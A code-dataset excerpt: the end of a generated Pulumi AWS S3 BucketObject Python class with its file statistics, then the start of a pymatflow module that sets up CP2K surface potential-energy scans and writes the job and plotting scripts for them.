bucket=examplebucket.id,
source=pulumi.FileAsset("index.html"),
server_side_encryption="AES256")
```
### S3 Object Lock
```python
import pulumi
import pulumi_aws as aws
examplebucket = aws.s3.Bucket("examplebucket",
acl="private",
versioning=aws.s3.BucketVersioningArgs(
enabled=True,
),
object_lock_configuration=aws.s3.BucketObjectLockConfigurationArgs(
object_lock_enabled="Enabled",
))
examplebucket_object = aws.s3.BucketObject("examplebucketObject",
key="someobject",
bucket=examplebucket.id,
source=pulumi.FileAsset("important.txt"),
object_lock_legal_hold_status="ON",
object_lock_mode="GOVERNANCE",
object_lock_retain_until_date="2021-12-31T23:59:60Z",
force_destroy=True)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] acl: The [canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Defaults to "private".
:param pulumi.Input[str] bucket: The name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.
:param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.
:param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.
:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.
:param pulumi.Input[str] content_language: The language the content is in e.g. en-US or en-GB.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
:param pulumi.Input[str] etag: Used to trigger updates. The only meaningful value is `${filemd5("path/to/file")}` (this provider 0.11.12 or later) or `${md5(file("path/to/file"))}` (this provider 0.11.11 or earlier).
This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = "aws:kms"`.
:param pulumi.Input[bool] force_destroy: Allow the object to be deleted by removing any legal hold on any object version.
Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] kms_key_id: Specifies the AWS KMS Key ARN to use for object encryption.
This value is a fully qualified **ARN** of the KMS Key. If using `kms.Key`,
use the exported `arn` attribute:
`kms_key_id = "${aws_kms_key.foo.arn}"`
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: A map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).
:param pulumi.Input[str] object_lock_legal_hold_status: The [legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.
:param pulumi.Input[str] object_lock_mode: The object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.
:param pulumi.Input[str] object_lock_retain_until_date: The date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in S3. Valid values are "`AES256`" and "`aws:kms`".
:param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: The path to a file that will be read and uploaded as raw bytes for the object content.
:param pulumi.Input[str] storage_class: Specifies the desired [Storage Class](http://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html)
for the object. Can be either "`STANDARD`", "`REDUCED_REDUNDANCY`", "`ONEZONE_IA`", "`INTELLIGENT_TIERING`", "`GLACIER`", "`DEEP_ARCHIVE`", or "`STANDARD_IA`". Defaults to "`STANDARD`".
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the object.
:param pulumi.Input[str] website_redirect: Specifies a target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['acl'] = acl
if bucket is None:
raise TypeError("Missing required property 'bucket'")
__props__['bucket'] = bucket
__props__['cache_control'] = cache_control
__props__['content'] = content
__props__['content_base64'] = content_base64
__props__['content_disposition'] = content_disposition
__props__['content_encoding'] = content_encoding
__props__['content_language'] = content_language
__props__['content_type'] = content_type
__props__['etag'] = etag
__props__['force_destroy'] = force_destroy
__props__['key'] = key
__props__['kms_key_id'] = kms_key_id
__props__['metadata'] = metadata
__props__['object_lock_legal_hold_status'] = object_lock_legal_hold_status
__props__['object_lock_mode'] = object_lock_mode
__props__['object_lock_retain_until_date'] = object_lock_retain_until_date
__props__['server_side_encryption'] = server_side_encryption
__props__['source'] = source
__props__['storage_class'] = storage_class
__props__['tags'] = tags
__props__['website_redirect'] = website_redirect
__props__['version_id'] = None
super(BucketObject, __self__).__init__(
'aws:s3/bucketObject:BucketObject',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_base64: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_language: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
force_destroy: Optional[pulumi.Input[bool]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,
object_lock_mode: Optional[pulumi.Input[str]] = None,
object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,
storage_class: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
version_id: Optional[pulumi.Input[str]] = None,
website_redirect: Optional[pulumi.Input[str]] = None) -> 'BucketObject':
"""
Get an existing BucketObject resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] acl: The [canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Defaults to "private".
:param pulumi.Input[str] bucket: The name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.
:param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.
:param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.
:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.
:param pulumi.Input[str] content_language: The language the content is in e.g. en-US or en-GB.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
:param pulumi.Input[str] etag: Used to trigger updates. The only meaningful value is `${filemd5("path/to/file")}` (this provider 0.11.12 or later) or `${md5(file("path/to/file"))}` (this provider 0.11.11 or earlier).
This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = "aws:kms"`.
:param pulumi.Input[bool] force_destroy: Allow the object to be deleted by removing any legal hold on any object version.
Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] kms_key_id: Specifies the AWS KMS Key ARN to use for object encryption.
This value is a fully qualified **ARN** of the KMS Key. If using `kms.Key`,
use the exported `arn` attribute:
`kms_key_id = "${aws_kms_key.foo.arn}"`
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: A map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).
:param pulumi.Input[str] object_lock_legal_hold_status: The [legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.
:param pulumi.Input[str] object_lock_mode: The object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.
:param pulumi.Input[str] object_lock_retain_until_date: The date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in S3. Valid values are "`AES256`" and "`aws:kms`".
:param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: The path to a file that will be read and uploaded as raw bytes for the object content.
:param pulumi.Input[str] storage_class: Specifies the desired [Storage Class](http://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html)
for the object. Can be either "`STANDARD`", "`REDUCED_REDUNDANCY`", "`ONEZONE_IA`", "`INTELLIGENT_TIERING`", "`GLACIER`", "`DEEP_ARCHIVE`", or "`STANDARD_IA`". Defaults to "`STANDARD`".
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the object.
:param pulumi.Input[str] version_id: A unique version ID value for the object, if bucket versioning
is enabled.
:param pulumi.Input[str] website_redirect: Specifies a target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["acl"] = acl
__props__["bucket"] = bucket
__props__["cache_control"] = cache_control
__props__["content"] = content
__props__["content_base64"] = content_base64
__props__["content_disposition"] = content_disposition
__props__["content_encoding"] = content_encoding
__props__["content_language"] = content_language
__props__["content_type"] = content_type
__props__["etag"] = etag
__props__["force_destroy"] = force_destroy
__props__["key"] = key
__props__["kms_key_id"] = kms_key_id
__props__["metadata"] = metadata
__props__["object_lock_legal_hold_status"] = object_lock_legal_hold_status
__props__["object_lock_mode"] = object_lock_mode
__props__["object_lock_retain_until_date"] = object_lock_retain_until_date
__props__["server_side_encryption"] = server_side_encryption
__props__["source"] = source
__props__["storage_class"] = storage_class
__props__["tags"] = tags
__props__["version_id"] = version_id
__props__["website_redirect"] = website_redirect
return BucketObject(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def acl(self) -> pulumi.Output[Optional[str]]:
"""
The [canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Defaults to "private".
"""
return pulumi.get(self, "acl")
@property
@pulumi.getter
def bucket(self) -> pulumi.Output[str]:
"""
The name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.
"""
return pulumi.get(self, "bucket")
@property
@pulumi.getter(name="cacheControl")
def cache_control(self) -> pulumi.Output[Optional[str]]:
"""
Specifies caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.
"""
return pulumi.get(self, "cache_control")
@property
@pulumi.getter
def content(self) -> pulumi.Output[Optional[str]]:
"""
Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.
"""
return pulumi.get(self, "content")
@property
@pulumi.getter(name="contentBase64")
def content_base64(self) -> pulumi.Output[Optional[str]]:
"""
Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.
"""
return pulumi.get(self, "content_base64")
@property
@pulumi.getter(name="contentDisposition")
def content_disposition(self) -> pulumi.Output[Optional[str]]:
"""
Specifies presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.
"""
return pulumi.get(self, "content_disposition")
@property
@pulumi.getter(name="contentEncoding")
def content_encoding(self) -> pulumi.Output[Optional[str]]:
"""
Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.
"""
return pulumi.get(self, "content_encoding")
@property
@pulumi.getter(name="contentLanguage")
def content_language(self) -> pulumi.Output[Optional[str]]:
"""
The language the content is in e.g. en-US or en-GB.
"""
return pulumi.get(self, "content_language")
@property
@pulumi.getter(name="contentType")
def content_type(self) -> pulumi.Output[str]:
"""
A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
"""
return pulumi.get(self, "content_type")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
Used to trigger updates. The only meaningful value is `${filemd5("path/to/file")}` (this provider 0.11.12 or later) or `${md5(file("path/to/file"))}` (this provider 0.11.11 or earlier).
This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = "aws:kms"`.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="forceDestroy")
def force_destroy(self) -> pulumi.Output[Optional[bool]]:
"""
Allow the object to be deleted by removing any legal hold on any object version.
Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.
"""
return pulumi.get(self, "force_destroy")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
The name of the object once it is in the bucket.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the AWS KMS Key ARN to use for object encryption.
This value is a fully qualified **ARN** of the KMS Key. If using `kms.Key`,
use the exported `arn` attribute:
`kms_key_id = "${aws_kms_key.foo.arn}"`
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter
def metadata(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).
"""
return pulumi.get(self, "metadata")
@property
@pulumi.getter(name="objectLockLegalHoldStatus")
def object_lock_legal_hold_status(self) -> pulumi.Output[Optional[str]]:
"""
The [legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.
"""
return pulumi.get(self, "object_lock_legal_hold_status")
@property
@pulumi.getter(name="objectLockMode")
def object_lock_mode(self) -> pulumi.Output[Optional[str]]:
"""
The object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.
"""
return pulumi.get(self, "object_lock_mode")
@property
@pulumi.getter(name="objectLockRetainUntilDate")
def object_lock_retain_until_date(self) -> pulumi.Output[Optional[str]]:
"""
The date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).
"""
return pulumi.get(self, "object_lock_retain_until_date")
@property
@pulumi.getter(name="serverSideEncryption")
def server_side_encryption(self) -> pulumi.Output[str]:
"""
Specifies server-side encryption of the object in S3. Valid values are "`AES256`" and "`aws:kms`".
"""
return pulumi.get(self, "server_side_encryption")
@property
@pulumi.getter
def source(self) -> pulumi.Output[Optional[Union[pulumi.Asset, pulumi.Archive]]]:
"""
The path to a file that will be read and uploaded as raw bytes for the object content.
"""
return pulumi.get(self, "source")
@property
@pulumi.getter(name="storageClass")
def storage_class(self) -> pulumi.Output[str]:
"""
Specifies the desired [Storage Class](http://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html)
for the object. Can be either "`STANDARD`", "`REDUCED_REDUNDANCY`", "`ONEZONE_IA`", "`INTELLIGENT_TIERING`", "`GLACIER`", "`DEEP_ARCHIVE`", or "`STANDARD_IA`". Defaults to "`STANDARD`".
"""
return pulumi.get(self, "storage_class")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A map of tags to assign to the object.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="versionId")
def version_id(self) -> pulumi.Output[str]:
"""
A unique version ID value for the object, if bucket versioning
is enabled.
"""
return pulumi.get(self, "version_id")
@property
@pulumi.getter(name="websiteRedirect")
def website_redirect(self) -> pulumi.Output[Optional[str]]:
"""
Specifies a target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).
"""
return pulumi.get(self, "website_redirect")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 60.438923
| 378
| 0.672479
| 3,792
| 29,192
| 5.016878
| 0.09942
| 0.057822
| 0.061817
| 0.038793
| 0.828164
| 0.792893
| 0.769291
| 0.769291
| 0.760986
| 0.757622
| 0
| 0.014032
| 0.218793
| 29,192
| 482
| 379
| 60.564315
| 0.820171
| 0.549945
| 0
| 0.334783
| 1
| 0
| 0.124404
| 0.027934
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117391
| false
| 0.004348
| 0.021739
| 0.008696
| 0.256522
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4c60e75a2984de6910059a8ca8fa8e33aa6f067
| 50,974
|
py
|
Python
|
pymatflow/flow/surface_pes.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 6
|
2020-03-06T16:13:08.000Z
|
2022-03-09T07:53:34.000Z
|
pymatflow/flow/surface_pes.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 1
|
2021-10-02T02:23:08.000Z
|
2021-11-08T13:29:37.000Z
|
pymatflow/flow/surface_pes.py
|
DeqiTang/pymatflow
|
bd8776feb40ecef0e6704ee898d9f42ded3b0186
|
[
"MIT"
] | 1
|
2021-07-10T16:28:14.000Z
|
2021-07-10T16:28:14.000Z
|
"""
Overall manger for surface PES calculation
Prospects:
we might use a special scanning matter(moving atoms), like those used in AFM, and get the
image of the surface potential energy, which may help build the dataset for traning of the
surface recoginization and classification for microscopy picture and help use research on
the surface with image processing technique.
"""
import numpy as np
import sys
import os
import shutil
from pymatflow.remote.server import server_handle
import pymatflow.cp2k as cp2k
import pymatflow.qe as qe
import pymatflow.vasp as vasp
"""
"""
class cp2k_run(cp2k.opt_run):
"""
Note:
calculate the surface potential energy surface via CP2K.
"""
def __init__(self):
"""
"""
super().__init__()
self.set_geo_opt()
self.pes_params = {}
self.set_pes() # set default value
def set_pes(self, move_atom=[-1], xrange=[0, 1.5, 0.1], yrange=[0, 1.5, 0.5], zshift=0.0, fix_z=1, fix_y=2, fix_x=2):
"""
:parma move_atom: the atoms that will move in the calculation, list start from 0.
:param xrange: x range for moving the specified moving atoms.
:param: yrange: y range for moving the specified moving atoms
:param: zshift: z shift for the moving atoms, will shift the z of specified moving atoms by value of zshift
:param: fix_z: 0 -> do not fix any z of the atoms, 1 -> only fix z of the buttom atoms, 2: fix z of both the buttom and the moving atoms.
:param: fix_y: 0 -> do not fix any y of the atoms, 1 -> only fix y of the buttom atoms, 2: fix y of both the buttom and the moving atoms.
:param: fix_x: 0 -> do not fix any x of the atoms, 1 -> only fix x of the buttom atoms, 2: fix x of both the buttom and the moving atoms.
"""
self.pes_params["move_atom"] = move_atom
self.pes_params["xrange"] = xrange
self.pes_params["yrange"] = yrange
self.pes_params["zshift"] = zshift
self.pes_params["fix_z"] = fix_z
self.pes_params["fix_y"] = fix_y
self.pes_params["fix_x"] = fix_x
def run(self, directory="tmp-cp2k-pes-opt", runopt="gen", auto=0):
if runopt == "gen" or runopt == "genrun":
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile(self.force_eval.subsys.xyz.file, os.path.join(directory, os.path.basename(self.force_eval.subsys.xyz.file)))
# use &COORD to input structure rather than &TOPOLOGY
self.force_eval.subsys.coord.status = True
self.force_eval.subsys.topology.status = False
xrange = self.pes_params["xrange"]
yrange = self.pes_params["yrange"]
zshift = self.pes_params["zshift"]
fix_z = self.pes_params["fix_z"]
fix_y = self.pes_params["fix_y"]
fix_x = self.pes_params["fix_x"]
os.chdir(directory)
# generate the input files and the initial trajectory
os.system("mkdir -p post-processing")
for deltay in np.arange(yrange[0], yrange[1], yrange[2]):
for deltax in np.arange(xrange[0], xrange[1], xrange[2]):
os.mkdir("_%.3f_%.3f_" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0))
for i in self.pes_params["move_atom"]:
self.force_eval.subsys.xyz.atoms[i].x += deltax
self.force_eval.subsys.xyz.atoms[i].y += deltay
# shift z of the specified atoms by self.pes_params["zshfit"]
#----------------------------------------------
self.force_eval.subsys.xyz.atoms[i].z += zshift
# first fix xyz of all atoms
for i in range(len(self.force_eval.subsys.xyz.atoms)):
self.force_eval.subsys.xyz.atoms[i].fix = [True, True, True]
# unfix z of moving atoms or z of no moving atoms
if fix_z == 0:
for i in range(len(self.force_eval.subsys.xyz.atoms)):
self.force_eval.subsys.xyz.atoms[i].fix[2] = False
elif fix_z == 1:
for i in self.pes_params["move_atom"]:
self.force_eval.subsys.xyz.atoms[i].fix[2] = False
elif fix_z == 2:
# nothing need to do
pass
# unfix x or y of moving atoms or no moving atoms
if fix_y == 0:
for i in range(len(self.force_eval.subsys.xyz.atoms)):
self.force_eval.subsys.xyz.atoms[i].fix[1] = False
elif fix_y == 1:
for i in self.pes_params["move_atom"]:
self.force_eval.subsys.xyz.atoms[i].fix[1] = False
elif fix_y == 2:
# nothing need to do
pass
if fix_x == 0:
for i in range(len(self.force_eval.subsys.xyz.atoms)):
self.force_eval.subsys.xyz.atoms[i].fix[0] = False
elif fix_x == 1:
for i in self.pes_params["move_atom"]:
self.force_eval.subsys.xyz.atoms[i].fix[0]
elif fix_x == 2:
# noting to do
pass
with open("_%.3f_%.3f_/geo-opt.inp" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0), 'w') as fout:
self.glob.to_input(fout)
self.force_eval.to_input(fout)
self.motion.to_input(fout)
with open("post-processing/trajectory-initial.xyz", 'a') as fout:
# generate the xyz trajectory file -> (unrelaxed original traj)
fout.write("%d\n" % self.force_eval.subsys.xyz.natom)
fout.write("deltax: %.3f | deltay: %.3f\n" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0))
for atom in self.force_eval.subsys.xyz.atoms:
fout.write("%s %.9f %.9f %.9f\n" % (atom.name, atom.x, atom.y, atom.z))
for i in self.pes_params["move_atom"]:
# now we move the x y z back to the original value
self.force_eval.subsys.xyz.atoms[i].x -= deltax
self.force_eval.subsys.xyz.atoms[i].y -= deltay
self.force_eval.subsys.xyz.atoms[i].z -= zshift
# write pbs job control script
with open("pes-relax.pbs", 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#PBS -N %s\n" % self.run_params["jobname"])
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" # run the calculation\n")
fout.write(" cd _${deltax}_${deltay}_\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE %s -in %s > %s\n" % ("$PMF_CP2K", "geo-opt.inp", "geo-opt.out"))
fout.write(" cd ../\n")
fout.write("done\n")
fout.write("done\n")
# write bash script to generate the xyz trajectory file -> (relaxed)
#with open("get_traj_relaxed.sh", 'w') as fout:
fout.write("\n\n")
fout.write("# code to extract final structure for each combination of deltax and deltay\n")
#fout.write("#!/bin/bash\n")
#fout.write("\n")
#fout.write("\n")
fout.write("output_trajfile=./post-processing/trajectory-relaxed.xyz\n")
fout.write("natom=%d\n" % self.force_eval.subsys.xyz.natom)
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" echo ${natom} >> ${output_trajfile}\n")
fout.write(" cat >> ${output_trajfile}<<EOF\n")
fout.write("deltax: ${deltax} | deltay: ${deltay}\n")
fout.write("EOF\n")
fout.write(" cat _${deltax}_${deltay}_/ab-initio-pos-1.xyz | tail -n -${natom} >> ${output_trajfile}\n")
fout.write("done\n")
fout.write("done\n")
# write result analysis file
#with open("get_pes.sh", 'w') as fout:
fout.write("\n\n")
#fout.write("#!/bin/bash\n")
fout.write("cat > post-processing/pes.data<<EOF\n")
fout.write("# format: x y energy(Ry)\n")
fout.write("EOF\n")
fout.write("\n")
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
fout.write("do\n")
fout.write(" if [ ${deltax} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltax=0.000\n")
fout.write(" fi\n")
fout.write(" if [ ${deltay} == -0.000 ]\n")
fout.write(" then\n")
fout.write(" deltay=0.000\n")
fout.write(" fi\n")
fout.write(" energy=`cat _${deltax}_${deltay}_/geo-opt.out | grep 'ENERGY| Total FORCE_EVAL ( QS ) energy (a.u.):' | tail -1`\n")
fout.write(" cat >> post-processing/pes.data<<EOF\n")
fout.write("${deltax} ${deltay} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("done\n")
fout.write("\n")
fout.write("cat > post-processing/plot.gnuplot<<EOF\n")
fout.write("set term png\n")
fout.write("set output 'pes.png'\n")
fout.write("set xlabel 'x'\n")
fout.write("set ylabel 'y'\n")
fout.write("splot 'pes.data'\n")
fout.write("EOF\n")
fout.write("cd post-processing; gnuplot plot.gnuplot; cd ../\n")
# write local bash run script
with open("pes-relax.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("\n")
fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
fout.write("do\n")
fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
